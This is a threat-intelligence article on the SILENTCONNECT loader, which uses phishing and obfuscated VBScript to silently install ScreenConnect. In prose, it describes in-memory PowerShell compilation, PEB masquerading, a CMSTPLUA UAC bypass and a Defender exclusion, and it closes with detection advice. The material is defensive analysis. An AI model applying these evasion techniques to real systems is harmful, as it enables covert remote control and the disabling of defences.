A new multi-stage malware loader dubbed SILENTCONNECT has been observed silently deploying the ConnectWise ScreenConnect remote monitoring and management (RMM) tool onto Windows systems. This sophisticated threat, active since at least March 2025, leverages VBScript, in-memory PowerShell execution, and Process Environment Block (PEB) masquerading to achieve its objectives, granting attackers significant control over compromised corporate environments.
The infection chain begins with a phishing email, often containing a deceptive link masquerading as a legitimate invitation or proposal. Upon clicking, victims are redirected to a Cloudflare Turnstile CAPTCHA page for human verification. Following successful verification, a VBScript file, such as E-INVITE.vbs, is automatically downloaded. Threat actors have been observed using convincing filenames, like Proposal-03-2026.vbs, to lower victim suspicion.
SILENTCONNECT: A Stealthy RMM Deployment Through Advanced Evasion Techniques
Elastic Security Labs researchers identified the SILENTCONNECT campaign in early March 2026, noting its “living-off-the-land” approach that generated numerous behavioral alerts. The initial VBScript download triggered a “Suspicious Windows Script Downloaded from the Internet” detection rule, providing investigators with a crucial pivot point. Analysis revealed the VBScript was hosted on Cloudflare’s R2.dev storage, while the subsequent C# payload was fetched from Google Drive, utilizing trusted platforms to evade common network defenses.
SILENTCONNECT’s obfuscation techniques are designed to blend seamlessly with normal Windows activity. The VBScript employs a children’s story as a decoy, embedding malicious instructions within obfuscated `Replace` and `Chr` functions. Once decoded, these functions execute a PowerShell command that utilizes the native `curl.exe` utility to download a C# source file. This file is then compiled and executed entirely in memory using `Add-Type`, a method that bypasses traditional endpoint security tools that typically rely on detecting malicious executables written to disk.
The threat actor’s infrastructure, as analyzed through platforms like VirusTotal, demonstrates a consistent pattern of operation. Phishing emails with subjects like “YOU ARE INVITED,” purportedly from a fake company, link back to specific email addresses like dan@checkfirst[.]net[.]au. A critical operational security (OPSEC) oversight identified by researchers was the reuse of the same URI path, `download_invitee.php`, across multiple compromised websites. This pattern allowed for the mapping of the entire campaign infrastructure through targeted searches.
PEB Masquerading and Defense Evasion Strategies
Upon successful execution, the .NET loader undergoes a period of dormancy, sleeping for approximately 15 seconds before proceeding. It then allocates executable memory via `NtAllocateVirtualMemory` and injects a small shellcode stub into this region. This shellcode’s primary function is to locate the address of the Process Environment Block (PEB), a critical Windows data structure that contains information about loaded modules within a process.
By obtaining the PEB address, SILENTCONNECT performs PEB masquerading. It modifies its own module list entry within the PEB, overwriting the `BaseDLLName` and `FullDllName` fields. These fields are altered to display `winhlp32.exe` and `c:windowswinhlp32.exe`, respectively. This technique aims to disguise the malware loader as a seemingly legitimate Windows Help utility, a common tactic to evade detection by Endpoint Detection and Response (EDR) solutions that often rely on PEB data for process analysis.
Further defense evasion tactics include bypassing User Account Control (UAC) through the CMSTPLUA COM interface. The loader then stores its parameters in a reversed order as an additional obfuscation layer. Crucially, SILENTCONNECT proceeds to add an exclusion for `.exe` files within Microsoft Defender, effectively disabling real-time scanning for executable files. This allows for the subsequent download of the ScreenConnect MSI installer from `bumptobabeco[.]top` using `curl.exe`.
The ScreenConnect MSI is then installed via `msiexec.exe` and configured as a Windows service. This service then establishes a communication channel with the attacker’s server, typically over TCP port 8041, providing the attackers with full hands-on-keyboard control over the compromised machine.
Organizations are advised to conduct regular audits for unauthorized remote monitoring and management (RMM) deployments. Monitoring outbound network traffic for connections to unknown ScreenConnect server addresses is also recommended. Security teams should flag PowerShell commands that combine `Add-Type` with remote downloads, investigate VBScript files downloaded from the internet, and remain vigilant for unexpected changes to Microsoft Defender exclusions. Additionally, tracking `NtAllocateVirtualMemory` calls originating from .NET processes may offer an early indicator of this threat.